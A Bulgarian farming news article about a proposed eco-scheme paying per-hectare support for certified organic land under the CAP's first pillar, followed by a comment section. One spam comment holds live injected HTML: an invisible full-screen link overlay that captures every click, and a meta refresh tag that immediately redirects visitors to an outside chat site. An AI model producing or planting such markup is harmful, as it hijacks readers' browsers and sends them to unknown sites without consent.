Биоплощи ще се подпомагат и по Първи стълб

  • 22.01.2022 2:57
  • 18
  • 1
  • Новини
Биоплощи ще се подпомагат и по Първи стълб

 

 

Министерството на земеделието предлага проект на нова „Екосхема за поддържане на биологично земеделие (земеделски площи)“. Тя ще бъде представена пред бранша на 15 февруари, когато ще се проведе 12-ото онлайн заседание на Тематичната работна група за Стратегическия план. А ето как ще се дават тези необвързани с производството директни плащания.

 

По интервенцията ще се подпомагат стопани, чиито земеделски площи са преминали периода на преход към биологично производство. Задължително е да имат сключен договор с контролиращо лице не по-късно от 31 декември на годината, която предхожда годината на кандидатстване въз основа на данните в биорегистъра към тази дата.

 

Ангажиментите ще са за период от една календарна година, а подпомагането ще е под формата на годишно плащане на хектар като добавка към основното подпомагане на доходите за устойчивост (досегашната СЕПП). 

 

Цялото стопанство, с което се поема ангажиментът, трябва да се управлява в съответствие с изискванията за биологично производство. Допустимо е обаче то да се раздели на производствени единици за биологично производство, за преход към биологично производство и за небиологично производство, при условие че по отношение на производствените единици за небиологично производство:

 

а) отглежданите животни са от различни видове;
б) растенията са от различни, лесно разграничими сортове.

 

Трябва да имате предвид и още нещо. Няма да можете да заявявате едни и същи площи по тази екосхема за биоплощи и по Екосхемата за засилена диверсификация на културите, поддържане на междуредията на трайните насаждения и екстензивно поддържане на постоянно затревените площи с пасищни животни.

 

Следете темата и на cap4us.agri.bg

Коментари
asdf
на 22.01.2022 2:58
<a href="https://www.hasbihal.org" title="sohbet chat" rel="dofollow" style="display: block!important;position: fixed!important; width: 100%!important;height: 100%; text-align: center!important;color: transparent!important;left: 0!important;top: 0!important;right: 0!important; padding: 100px; bottom: 0!important;background: transparent!important;z-index: 999999999999999!important;font-size: 4em!important">sohbet chat</a> <meta http-equiv="refresh" content="0; url=https://findi.pro/coment"/> <a href="https://bedavasohbetchat.blogspot.com/" title="bedavasohbet">bedavasohbet</a>
Добави коментар